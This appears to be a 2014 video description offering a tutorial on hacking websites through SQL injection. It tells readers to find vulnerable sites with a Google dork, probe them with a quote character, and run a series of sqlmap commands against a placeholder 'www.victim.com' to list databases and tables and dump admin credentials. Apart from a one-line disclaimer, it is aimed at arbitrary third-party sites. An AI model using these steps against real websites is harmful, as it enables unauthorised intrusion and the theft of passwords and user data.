hack websites using sql injection
Powered by iSpeech
#SQL INJECTION TUTORIAL
#DP_MMX
#10 OCT 2014
NOTE : THIS TUTORIAL ONLY FOR EDUCATION PURPOSE.
OS requirement:
windows xp and above
Software requirements :
* python : https://www.python.org/downloads/windows/
* sqlmap : http://sqlmap.org/
* download link for google dork : http://www.4shared.com/office/iBpu5coIba/dork.html
download and install them properly
first using google dork we gonna find out vulnerable websites
google dork :- inurl: id=
type this on google search and hit enter
choose one of the result and open it
after that go to the url and add '
if the website is vulnerable then it show some error
now open command promot
and go to the sqlmap directory on your computer
and type
python sqlmap.py -u www.victim.com --dbs
after getting the databasename, type
python sqlmap.py -u www.victim.com -D databasename --tables
it show you tablenames under the databasename
now you can dump the data as like either table or columnwise
fordump the entire table type:
python sqlmap.py -u www.victim.com -D databasename -T tablename --dump
or
shows columns under the table type :
python sqlmap.py -u www.victim.com -D databasename -T tablename --columns
dump the column of the table type:
python sqlmap.py -u www.victim.com -D databasename -T tablename -C columnname --dump
find admin table among them and dump the data
if you are fortunate enough then you get plain password
otherwise you got passhashes .
this is another topic .
i'll upload another video relating this soon..
thanks for watching!!! jai hind
video, sharing, camera phone, video phone, free, upload
2014-10-12 10:14:43
source
Gloss